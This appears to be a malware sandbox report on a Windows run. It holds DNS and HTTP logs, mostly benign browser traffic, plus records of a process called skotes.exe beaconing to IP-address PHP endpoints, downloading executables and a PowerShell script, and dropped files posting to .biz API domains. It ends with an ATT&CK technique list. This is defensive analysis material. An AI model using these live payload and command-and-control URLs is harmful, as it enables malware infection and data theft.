youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

172.217.169.14
GET

https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd

firefox.exe

Remote address:

142.250.180.14:443

Request

GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
host: www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
GET

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

firefox.exe

Remote address:

142.250.180.14:443

Request

GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: SOCS=CAAaBgiAw9O6Bg
cookie: YSC=_SG0yO8EYcE
cookie: __Secure-YEC=CgtZMVJuN0JKU1RHMCjBzte6BjIKCgJHQhIEGgAgRA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgRA%3D%3D
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A

Response

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

172.217.169.14

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.200.14
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN AAAA

Response

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:815::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:821::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:823::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:820::200e
DNS

firefox-settings-attachments.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-settings-attachments.cdn.mozilla.net

IN A

Response

firefox-settings-attachments.cdn.mozilla.net

IN CNAME

attachments.prod.remote-settings.prod.webservices.mozgcp.net

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.46
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.46
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN AAAA

Response

consent.youtube.com

IN AAAA

2a00:1450:4009:823::200e
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
GET

https://www.google.com/favicon.ico

firefox.exe

Remote address:

142.250.187.196:443

Request

GET /favicon.ico HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81f::2004
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.46
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.46
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

ciscobinary.openh264.org

firefox.exe

Remote address:

8.8.8.8:53

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
GET

http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

firefox.exe

Remote address:

88.221.134.155:80

Request

GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response

HTTP/1.1 200 OK

Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
ETag: 85430baed3398695717b0263807cf97c
Content-Length: 453023
Accept-Ranges: bytes
X-Timestamp: 1731034347.00215
Content-Type: application/zip
X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
Cache-Control: public, max-age=151658
Expires: Tue, 10 Dec 2024 12:44:56 GMT
Date: Sun, 08 Dec 2024 18:37:18 GMT
Connection: keep-alive
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.180.14
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.180.14
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN AAAA

Response

redirector.gvt1.com

IN AAAA

2a00:1450:4009:81e::200e
DNS

r3---sn-4g5edn6k.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r3---sn-4g5edn6k.gvt1.com

IN A

Response

r3---sn-4g5edn6k.gvt1.com

IN CNAME

r3.sn-4g5edn6k.gvt1.com

r3.sn-4g5edn6k.gvt1.com

IN A

74.125.111.136
DNS

r3.sn-4g5edn6k.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r3.sn-4g5edn6k.gvt1.com

IN A

Response

r3.sn-4g5edn6k.gvt1.com

IN A

74.125.111.136
DNS

r3.sn-4g5edn6k.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r3.sn-4g5edn6k.gvt1.com

IN AAAA

Response

r3.sn-4g5edn6k.gvt1.com

IN AAAA

2a00:1450:4001:d::8
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN AAAA

Response

play.google.com

IN AAAA

2a00:1450:4009:81d::200e

185.215.113.43:80

http://185.215.113.43/Zu7JuNko/index.php

http

skotes.exe

3.2kB
3.7kB
24
16

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200
31.41.244.11:80

http://31.41.244.11/files/5131681669/KeaEfrP.ps1

http

skotes.exe

206.4kB
11.2MB
4366
11532

HTTP Request

GET http://31.41.244.11/files/6554834407/B3vKvPi.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/806475321/0tClIDb.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/7658082748/wTMEVe8.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/6554834407/ntRoEwh.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/5131681669/KeaEfrP.ps1

HTTP Response

200
104.21.16.9:443

https://atten-supporse.biz/api

tls, http

0tClIDb.exe

982 B
4.3kB
9
9

HTTP Request

POST https://atten-supporse.biz/api

HTTP Response

200
172.67.162.65:443

https://se-blurry.biz/api

tls, http

0tClIDb.exe

977 B
4.3kB
9
9

HTTP Request

POST https://se-blurry.biz/api

HTTP Response

200
104.21.62.142:443

https://zinc-sneark.biz/api

tls, http

0tClIDb.exe

1.7kB
9.9kB
14
17

HTTP Request

POST https://zinc-sneark.biz/api

HTTP Response

403

HTTP Request

POST https://zinc-sneark.biz/api

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/off/random.exe

http

skotes.exe

221.7kB
7.7MB
3827
5515

HTTP Request

GET http://185.215.113.16/luma/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/steam/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/well/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/off/random.exe

HTTP Response

200
104.21.16.9:443

https://atten-supporse.biz/api

tls, http

78c83a40ec.exe

982 B
4.3kB
9
9

HTTP Request

POST https://atten-supporse.biz/api

HTTP Response

200
172.67.162.65:443

https://se-blurry.biz/api

tls, http

78c83a40ec.exe

977 B
4.3kB
9
9

HTTP Request

POST https://se-blurry.biz/api

HTTP Response

200
104.21.62.142:443

https://zinc-sneark.biz/api

tls, http

78c83a40ec.exe

1.7kB
9.9kB
14
16

HTTP Request

POST https://zinc-sneark.biz/api

HTTP Response

403

HTTP Request

POST https://zinc-sneark.biz/api

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/c4becf79229cb002.php

http

2427caf3c8.exe

727 B
625 B
5
5

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200
127.0.0.1:50992

firefox.exe
216.58.213.14:443

https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

tls, http2

firefox.exe

1.9kB
9.0kB
15
20

HTTP Request

GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
34.120.5.221:443

https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30

tls, http2

firefox.exe

1.7kB
12.3kB
13
18

HTTP Request

GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
142.250.180.14:443

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

tls, http2

firefox.exe

3.0kB
66.7kB
32
63

HTTP Request

GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd

HTTP Request

GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
34.117.121.53:443

firefox-settings-attachments.cdn.mozilla.net

tls

firefox.exe

1.5kB
21.1kB
15
23
142.250.200.46:443

consent.youtube.com

tls, http2

firefox.exe

1.2kB
7.6kB
10
10
127.0.0.1:51001

firefox.exe
142.250.187.196:443

https://www.google.com/favicon.ico

tls, http2

firefox.exe

1.8kB
7.5kB
14
16

HTTP Request

GET https://www.google.com/favicon.ico
88.221.134.155:80

http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

http

firefox.exe

7.3kB
467.0kB
152
339

HTTP Request

GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

HTTP Response

200
142.250.180.14:443

redirector.gvt1.com

tls

firefox.exe

1.7kB
8.9kB
18
21
74.125.111.136:443

r3---sn-4g5edn6k.gvt1.com

tls

firefox.exe

321.9kB
8.7MB
5047
6248
142.250.179.238:443

play.google.com

tls, http2

firefox.exe

1.3kB
7.6kB
11
10

8.8.8.8:53

atten-supporse.biz

dns

78c83a40ec.exe

64 B
96 B
1
1

DNS Request

atten-supporse.biz

DNS Response

104.21.16.9

172.67.165.166
8.8.8.8:53

se-blurry.biz

dns

78c83a40ec.exe

59 B
91 B
1
1

DNS Request

se-blurry.biz

DNS Response

172.67.162.65

104.21.81.153
8.8.8.8:53

zinc-sneark.biz

dns

78c83a40ec.exe

61 B
93 B
1
1

DNS Request

zinc-sneark.biz

DNS Response

104.21.62.142

172.67.136.167
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
73 B
1
1

DNS Request

youtube.com

DNS Response

216.58.213.14
8.8.8.8:53

spocs.getpocket.com

dns

firefox.exe

65 B
131 B
1
1

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166
8.8.8.8:53

getpocket.cdn.mozilla.net

dns

firefox.exe

71 B
174 B
1
1

DNS Request

getpocket.cdn.mozilla.net

DNS Response

34.120.5.221
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
73 B
1
1

DNS Request

youtube.com

DNS Response

216.58.213.14
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

82 B
98 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
85 B
1
1

DNS Request

youtube.com

DNS Response

2a00:1450:4009:816::200e
8.8.8.8:53

prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
98 B
1
1

DNS Request

prod.pocket.prod.cloudops.mozgcp.net

DNS Response

34.120.5.221
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
119 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
116 B
1
1

DNS Request

shavar.prod.mozaws.net

DNS Response

35.85.93.176

52.33.231.145

44.228.225.150
8.8.8.8:53

prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
110 B
1
1

DNS Request

prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:524c::
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
131 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
153 B
1
1

DNS Request

shavar.prod.mozaws.net
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
110 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
187 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
216.58.213.14:443

youtube.com

https

firefox.exe

3.2kB
9.3kB
7
10
8.8.8.8:53

www.youtube.com

dns

firefox.exe

61 B
319 B
1
1

DNS Request

www.youtube.com

DNS Response

142.250.180.14

216.58.201.110

172.217.169.78

216.58.212.206

142.250.187.206

172.217.169.46

142.250.187.238

142.250.200.14

216.58.204.78

142.250.178.14

172.217.16.238

142.250.200.46

142.250.179.238

172.217.169.14
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

69 B
293 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

172.217.16.238

216.58.204.78

216.58.212.206

172.217.169.14

142.250.179.238

142.250.200.46

172.217.169.78

142.250.180.14

172.217.169.46

216.58.201.110

142.250.178.14

142.250.187.238

142.250.187.206

142.250.200.14
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

69 B
181 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

2a00:1450:4009:815::200e

2a00:1450:4009:821::200e

2a00:1450:4009:823::200e

2a00:1450:4009:820::200e
8.8.8.8:53

firefox-settings-attachments.cdn.mozilla.net

dns

firefox.exe

90 B
177 B
1
1

DNS Request

firefox-settings-attachments.cdn.mozilla.net

DNS Response

34.117.121.53
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

106 B
122 B
1
1

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.117.121.53
142.250.180.14:443

youtube-ui.l.google.com

https

firefox.exe

5.1kB
11.1kB
11
16
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.200.46
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

106 B
199 B
1
1

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.200.46
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
93 B
1
1

DNS Request

consent.youtube.com

DNS Response

2a00:1450:4009:823::200e
142.250.200.46:443

consent.youtube.com

https

firefox.exe

2.2kB
9.3kB
9
11
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
88 B
1
1

DNS Request

www.google.com

DNS Response

2a00:1450:4009:81f::2004
142.250.187.196:443

www.google.com

https

firefox.exe

3.2kB
9.3kB
7
10
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.200.46
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.200.46
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
98 B
1
1

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Response

35.244.181.201
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.balrog.prod.cloudops.mozgcp.net
8.8.8.8:53

ciscobinary.openh264.org

dns

firefox.exe

70 B
286 B
1
1

DNS Request

ciscobinary.openh264.org

DNS Response

88.221.134.155

88.221.134.209
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

67 B
99 B
1
1

DNS Request

a19.dscg10.akamai.net

DNS Response

88.221.134.209

88.221.134.155
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

67 B
123 B
1
1

DNS Request

a19.dscg10.akamai.net

DNS Response

2a02:26f0:a1::58dd:869b

2a02:26f0:a1::58dd:86d1
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

142.250.180.14
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

142.250.180.14
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
93 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

2a00:1450:4009:81e::200e
142.250.180.14:443

redirector.gvt1.com

https

firefox.exe

3.3kB
9.3kB
8
10
8.8.8.8:53

r3---sn-4g5edn6k.gvt1.com

dns

firefox.exe

71 B
116 B
1
1

DNS Request

r3---sn-4g5edn6k.gvt1.com

DNS Response

74.125.111.136
8.8.8.8:53

r3.sn-4g5edn6k.gvt1.com

dns

firefox.exe

69 B
85 B
1
1

DNS Request

r3.sn-4g5edn6k.gvt1.com

DNS Response

74.125.111.136
8.8.8.8:53

r3.sn-4g5edn6k.gvt1.com

dns

firefox.exe

69 B
97 B
1
1

DNS Request

r3.sn-4g5edn6k.gvt1.com

DNS Response

2a00:1450:4001:d::8
74.125.111.136:443

r3.sn-4g5edn6k.gvt1.com

https

firefox.exe

1.9kB
5.9kB
6
7
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.250.179.238
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.250.179.238
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
89 B
1
1

DNS Request

play.google.com

DNS Response

2a00:1450:4009:81d::200e
142.250.179.238:443

play.google.com

https

firefox.exe

3.3kB
8.5kB
8
7

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion